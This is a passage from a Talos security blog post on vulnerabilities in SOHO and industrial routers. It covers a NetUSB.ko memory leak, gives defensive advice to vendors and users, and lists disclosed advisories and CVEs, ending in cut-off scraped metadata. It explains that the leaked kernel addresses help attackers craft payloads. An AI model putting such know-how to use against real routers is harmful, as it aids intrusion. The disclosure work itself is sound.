**TALOS-2019-0776**: Similar to TALOS-2019-0775, this vulnerability leaks memory. In this case, it leaks very useful memory such as stack boundary addresses, a pointer to a specific configuration function and notably or the base address of the running kernel module NetUSB.ko. This could potentially be combined with other remote attacks that could leverage this data when designing a specific payload for the target.\n\n### Observations\n\nMany other products use NetUSB.ko. A previously disclosed vulnerability in 2015 led researchers to believe a flaw in this very kernel module potentially existed in as many as 92 products across multiple vendors. For this analysis, we utilized the R8000 hardware to test the R8000 version of NetUSB.ko (1.0.2.66) and the R7900 version (1.0.2.69) since both modules are compiled for the same kernel. Specifically, the information disclosed in TALOS-2019-0776 appears to be particularly useful for recovering sensitive memory addresses for payload generation, regardless of the architecture/operating system that uses the kernel module.\n\n# Key observations\n\nSOHO routers are generally valuable targets for adversaries due to their position within the network and wide adoption within common network deployments. Their relatively low cost, wide availability, ease of acquisition and user-friendly management features leads to these products being in many homes, small and home offices, warehouses, coffee shops and many other businesses. They are even deployed as gateways providing remote access to industrial environments. \n\nVulnerabilities in these routers can provide entry to a huge variety of targets, and the same vulnerability can be used for impact, meaning these routers are high-value targets for malicious actors.\n\nThe security posture of these lower-cost routers has improved over the last few years, but in general, security advice for these devices is the same as it has been in the past. Some of the important security tenants for manufacturers are:\n\n * Features and services should be disabled by default unless they are critical for the operation of the device.\n * WAN-side management should be deactivated by default.\n * Support modern security features such as TLS/SSL encryption and make sure they're implemented properly.\n * Never trust user input.\n * Keep third-party code up-to-date.\n * Audit or familiarize yourself with integrated code.\n * Don't rely on obscure and undocumented diagnostic features or credentials.\n\nEach of the vulnerabilities discovered fall into one of these categories. Code quality is always going to be an additional concern, and the utilization of safe functions should always be enforced during development. Ideally, use static analysis tooling during development. This may not be financially viable for many products hoping to keep consumer costs low. In this case, lean on compiler warnings and any other methods of ensuring the highest code quality possible.\n\nSimple changes to the development process can mitigate many of the worst effects of these issues. Memory corruption, one of the most glaring vulnerabilities, can be mitigated by using memory-safe languages (i.e., Rust and Go). If safe languages are not an option, vendors should make sure to implement as many mitigations as possible, both compiler-based and OS-based. Examples of these mitigations would be non-executable stacks and address space layout randomization (ASLR).\n\nThe next most helpful change involves defining user interaction boundaries. Generic strings are notoriously difficult to parse or apply access controls to. By utilizing a well-defined API boundary, it is easier to validate user requests and input. The boundary also acts as an access control list to prevent a malicious user from executing arbitrary commands or providing input that would result in other unexpected behavior.\n\nThe most important security step a user of these devices can take is to assess each service present on the device. Verify that each service running is required for the day-to-day operation of each device, and disable all extraneous services. Services that cannot be disabled should be restricted to absolute minimal access or completely blocked using alternative methods, such as firewall rules to block traffic. During the acquisition process, if possible, basic research should be done to ensure the devices have sane, secure defaults enabled, such as the use of encrypted protocols for remote access and administration, if applicable. Start your assessment by reading the router user manually thoroughly, even before purchase. The quality of details concerning device features in a user manual is often indicative of the overall product quality.\n\nWhile the security posture of SOHO routers has generally improved, many could benefit from low-cost mitigations that would drastically improve their security posture. Over the past few years, Talos has published 141 advisories covering 289 CVEs within 13 SOHO and industrial routers and six common frameworks. Talos vulnerability research is always driven by the mandate to protect Cisco customers, but we also aim to improve the security of all devices we research. All research has been publicly disclosed, after disclosure to the vendor, according to Cisco's vulnerability disclosure policy. These disclosures directly result in vulnerability remediations that improve the security posture of anyone using these devices.\n\n# Vulnerability List\n\nThis blog post included a summary of each router and a few select vulnerabilities. Below is a list of all the advisories Talos disclosed post-VPNFilter.\n\n**Talos ID (Linked to Report)**\n\n| \n\n**CVE(s)**\n\n| \n\n**Product** \n \n---|---|--- \n \n[TALOS-2022-1511](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1511>)\n\n| \n\nCVE-2022-26376\n\n| \n\nAsuswrt and Asuswrt-Merlin New Gen \n \n[TALOS-2022-1592](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1592>)\n\n| \n\nCVE-2022-38393\n\n| \n\nAsus RT-AX82U \n \n[TALOS-2022-1590](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1590>)\n\n| \n\nCVE-2022-38105\n\n| \n\nAsus RT-AX82U \n \n[TALOS-2022-1586](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1586>)\n\n| \n\nCVE-2022-35401\n\n| \n\nAsus RT-AX82U \n \n[TALOS-2021-1361](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1361>)\n\n| \n\nCVE-2021-21913\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1285](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1285>)\n\n| \n\nCVE-2021-21820\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1284](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1284>)\n\n| \n\nCVE-2021-21819\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1283](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1283>)\n\n| \n\nCVE-2021-21818\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1282](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1282>)\n\n| \n\nCVE-2021-21817\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2021-1281](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1281>)\n\n| \n\nCVE-2021-21816\n\n| \n\nD-Link DIR3040 \n \n[TALOS-2022-1510](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1510>)\n\n| \n\nCVE-2022-27631\n\n| \n\nDD-WRT \n \n[TALOS-2022-1642](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1642>)\n\n| \n\nCVE-2022-38451\n\n| \n\nFreshTomato \n \n[TALOS-2022-1641](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1641>)\n\n| \n\nCVE-2022-42484\n\n| \n\nFreshTomato \n \n[TALOS-2022-1509](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1509>)\n\n| \n\nCVE-2022-28664 - CVE-2022-28665\n\n| \n\nFreshTomato \n \n[TALOS-2022-1523](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1523>)\n\n| \n\nCVE-2022-25932\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1522](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1522>)\n\n| \n\nCVE-2022-29888\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1521](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1521>)\n\n| \n\nCVE-2022-28689\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1520](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1520>)\n\n| \n\nCVE-2022-26023\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1519](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1519>)\n\n| \n\nCVE-2022-30543\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1518](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1518>)\n\n| \n\nCVE-2022-29481\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1501](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1501>)\n\n| \n\nCVE-2022-26518\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1500](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1500>)\n\n| \n\nCVE-2022-26075\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1499](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1499>)\n\n| \n\nCVE-2022-26420\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1496](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1496>)\n\n| \n\nCVE-2022-27172\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1495](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1495>)\n\n| \n\nCVE-2022-26510\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1481](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1481>)\n\n| \n\nCVE-2022-26780 - CVE-2022-26782\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1478](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1478>)\n\n| \n\nCVE-2022-26042\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1477](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1477>)\n\n| \n\nCVE-2022-25995\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1476](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1476>)\n\n| \n\nCVE-2022-26002\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1475](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1475>)\n\n| \n\nCVE-2022-26007\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1474](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1474>)\n\n| \n\nCVE-2022-26020\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1473](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1473>)\n\n| \n\nCVE-2022-26085\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1472](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1472>)\n\n| \n\nCVE-2022-21182\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1471](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1471>)\n\n| \n\nCVE-2022-24910\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1470](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1470>)\n\n| \n\nCVE-2022-25172\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1469](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1469>)\n\n| \n\nCVE-2022-21238\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2022-1468](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1468>)\n\n| \n\nCVE-2022-21809\n\n| \n\nInHand Networks InRouter302 \n \n[TALOS-2019-0776](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0776>)\n\n| \n\nCVE-2019-5017\n\n| \n\nKCodes NetUSB.ko \n \n[TALOS-2019-0775](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0775>)\n\n| \n\nCVE-2019-5016\n\n| \n\nKCodes NetUSB.ko \n \n[TALOS-2018-0625](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0625>)\n\n| \n\nCVE-2018-3953 - CVE-2018-3955\n\n| \n\nLinksys E Series \n \n[TALOS-2023-1723](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1723>)\n\n| \n\nCVE-2023-25582 - CVE-2023-25583\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1718](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1718>)\n\n| \n\nCVE-2023-24019\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1716](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1716>)\n\n| \n\nCVE-2023-25081 - CVE-2023-25124\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1715](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1715>)\n\n| \n\nCVE-2023-24018\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1714](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1714>)\n\n| \n\nCVE-2023-22653\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1713](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1713>)\n\n| \n\nCVE-2023-24595\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1712](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1712>)\n\n| \n\nCVE-2023-22299\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1711](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1711>)\n\n| \n\nCVE-2023-22365\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1710](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1710>)\n\n| \n\nCVE-2023-24582 - CVE-2023-24583\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1706](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1706>)\n\n| \n\nCVE-2023-24519 - CVE-2023-24520\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1705](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1705>)\n\n| \n\nCVE-2023-23546\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1699](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1699>)\n\n| \n\nCVE-2023-22659\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1698](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1698>)\n\n| \n\nCVE-2023-22306\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1697](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1697>)\n\n| \n\nCVE-2023-23902\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1696](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1696>)\n\n| \n\nCVE-2023-23571\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1695](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1695>)\n\n| \n\nCVE-2023-23547\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1694](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1694>)\n\n| \n\nCVE-2023-23550\n\n| \n\nMilesight UR32L \n \n[TALOS-2023-1704](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1704>)\n\n| \n\nCVE-2023-24496 - CVE-2023-24497\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1703](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1703>)\n\n| \n\nCVE-2023-22371\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1702](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1702>)\n\n| \n\nCVE-2023-23907\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1701](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1701>)\n\n| \n\nCVE-2023-22319\n\n| \n\nMilesightVPN \n \n[TALOS-2023-1700](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1700>)\n\n| \n\nCVE-2023-22844\n\n| \n\nMilesightVPN \n \n[TALOS-2022-1598](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1598>)\n\n| \n\nCVE-2022-38458\n\n| \n\nNetgear Orbi Router RBR750 \n \n[TALOS-2022-1597](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1597>)\n\n| \n\nCVE-2022-36429\n\n| \n\nNetgear Orbi Satellite RBS750 \n \n[TALOS-2022-1596](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1596>)\n\n| \n\nCVE-2022-37337\n\n| \n\nNetgear Orbi Router RBR750 \n \n[TALOS-2022-1595](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1595>)\n\n| \n\nCVE-2022-38452\n\n| \n\nNetgear Orbi Router RBR750 \n \n[TALOS-2019-0893](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0893>)\n\n| \n\n\u200b\u200bCVE-2019-5101 - CVE-2019-5102\n\n| \n\nOpenWrt \n \n[TALOS-2022-1580](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1580>)\n\n| \n\nCVE-2022-34845\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1579](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1579>)\n\n| \n\nCVE-2022-33897\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1578](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1578>)\n\n| \n\nCVE-2022-34850\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1577](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1577>)\n\n| \n\nCVE-2022-33150\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1576](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1576>)\n\n| \n\nCVE-2022-32765\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1575](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1575>)\n\n| \n\nCVE-2022-35261-CVE-2022-35271\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1573](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1573>)\n\n| \n\nCVE-2022-33325-CVE-2022-33329\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1572](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1572>)\n\n| \n\nCVE-2022-33312-CVE-2022-33314\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1571](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1571>)\n\n| \n\nCVE-2022-28127\n\n| \n\nRobustel R1510 \n \n[TALOS-2022-1570](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1570>)\n\n| \n\nCVE-2022-32585\n\n| \n\nRobustel R1510 \n \n[TALOS-2018-0756](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0756>)\n\n| \n\nCVE-2018-4072 - CVE-2018-4073\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0755](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0755>)\n\n| \n\nCVE-2018-4070 - CVE-2018-4071\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0754](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0754>)\n\n| \n\nCVE-2018-4069\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0753](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0753>)\n\n| \n\nCVE-2018-4068\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0752](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0752>)\n\n| \n\nCVE-2018-4067\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0751](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0751>)\n\n| \n\nCVE-2018-4066\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0750](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0750>)\n\n| \n\nCVE-2018-4065\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0749](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0749>)\n\n| \n\nCVE-2018-4064\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0748](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0748>)\n\n| \n\nCVE-2018-4063\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0747](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0747>)\n\n| \n\nCVE-2018-4062\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2018-0746](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0746>)\n\n| \n\nCVE-2018-4061\n\n| \n\nSierra Wireless Airlink \n \n[TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>)\n\n| \n\nCVE-2022-42490-CVE-2022-42493\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>)\n\n| \n\nCVE-2022-41991\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>)\n\n| \n\nCVE-2022-40222\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>)\n\n| \n\nCVE-2022-41154\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>)\n\n| \n\nCVE-2022-38066\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>)\n\n| \n\nCVE-2022-40985-CVE-2022-41030\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>)\n\n| \n\nCVE-2022-40220\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>)\n\n| \n\nCVE-2022-39045\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>)\n\n| \n\nCVE-2022-38715\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>)\n\n| \n\nCVE-2022-38088\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>)\n\n| \n\nCVE-2022-38459\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>)\n\n| \n\nCVE-2022-40969\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>)\n\n| \n\nCVE-2022-40701\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>)\n\n| \n\nCVE-2022-36279\n\n| \n\nSiretta QUARTZ-GOLD \n \n[TALOS-2020-1064](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1064>)\n\n| \n\nNone (Cloud)\n\n| \n\nSynology QuickConnect \n \n[TALOS-2020-1060](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1060>)\n\n| \n\nNone (Cloud)\n\n| \n\nSynology QuickConnect \n \n[TALOS-2020-1087](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1087>)\n\n| \n\nCVE-2020-27659-CVE-2020-27660\n\n| \n\nSynology SRM \n \n[TALOS-2020-1086](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1086>)\n\n| \n\nCVE-2020-27658\n\n| \n\nSynology SRM \n \n[TALOS-2020-1071](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1071>)\n\n| \n\nCVE-2020-27656-CVE-2020-27657\n\n| \n\nSynology SRM \n \n[TALOS-2020-1066](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1066>)\n\n| \n\nCVE-2020-27655\n\n| \n\nSynology SRM \n \n[TALOS-2020-1065](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1065>)\n\n| \n\nCVE-2020-27654, CVE-2020-11117\n\n| \n\nSynology SRM \n \n[TALOS-2020-1061](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1061>)\n\n| \n\nCVE-2020-27652-CVE-2020-27653\n\n| \n\nSynology SRM \n \n[TALOS-2020-1059](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1059>)\n\n| \n\nCVE-2020-27650-CVE-2020-27651\n\n| \n\nSynology SRM \n \n[TALOS-2020-1058](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1058>)\n\n| \n\nCVE-2020-27648-CVE-2020-27649\n\n| \n\nSynology SRM \n \n[TALOS-2020-1051](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1051>)\n\n| \n\nCVE-2019-11823\n\n| \n\nSynology SRM \n \n[TALOS-2022-1507](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1507>)\n\n| \n\nCVE-2022-26346\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1506](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1506>)\n\n| \n\nCVE-2022-27178\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1505](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1505>)\n\n| \n\nCVE-2022-27185\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1504](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1504>)\n\n| \n\nCVE-2022-27630\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1503](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1503>)\n\n| \n\nCVE-2022-27633\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1502](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1502>)\n\n| \n\nCVE-2022-27660\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1484](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1484>)\n\n| \n\nCVE-2022-26342\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1483](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1483>)\n\n| \n\nCVE-2022-26009\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1482](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1482>)\n\n| \n\nCVE-2022-25996\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1463](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1463>)\n\n| \n\nCVE-2022-24005 - CVE-2022-24029\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1462](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1462>)\n\n| \n\nCVE-2022-23103\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1459](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1459>)\n\n| \n\nCVE-2022-22144\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1458](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1458>)\n\n| \n\nCVE-2022-22140\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1457](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1457>)\n\n| \n\nCVE-2022-21178\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1456](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1456>)\n\n| \n\nCVE-2022-21201\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1455](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1455>)\n\n| \n\nCVE-2022-23918 - CVE-2022-23919\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2022-1454](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1454>)\n\n| \n\nCVE-2022-23399\n\n| \n\nTCL LinkHub Mesh Wifi \n \n[TALOS-2018-0620](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0620>)\n\n| \n\nCVE-2018-3951\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2018-0619](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0619>)\n\n| \n\nCVE-2018-3950\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2018-0618](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0618>)\n\n| \n\nCVE-2018-3949\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2018-0617](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0617>)\n\n| \n\nCVE-2018-3948\n\n| \n\nTP-Link TL-R600VPN \n \n[TALOS-2021-1321](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1321>)\n\n| \n\nCVE-2021-21749\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1320](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1320>)\n\n| \n\nCVE-2021-21748\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1319](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1319>)\n\n| \n\nCVE-2021-21747\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1318](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1318>)\n\n| \n\nCVE-2021-21746\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1317](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1317>)\n\n| \n\nCVE-2021-21745\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1316](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1316>)\n\n| \n\nCVE-2021-21744\n\n| \n\nZTE MF971R \n \n[TALOS-2021-1313](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1313>)\n\n| \n\nCVE-2021-21743\n\n| \n\nZTE MF971R", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-02T12:00:19", "type": "talosblog", "title": "The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 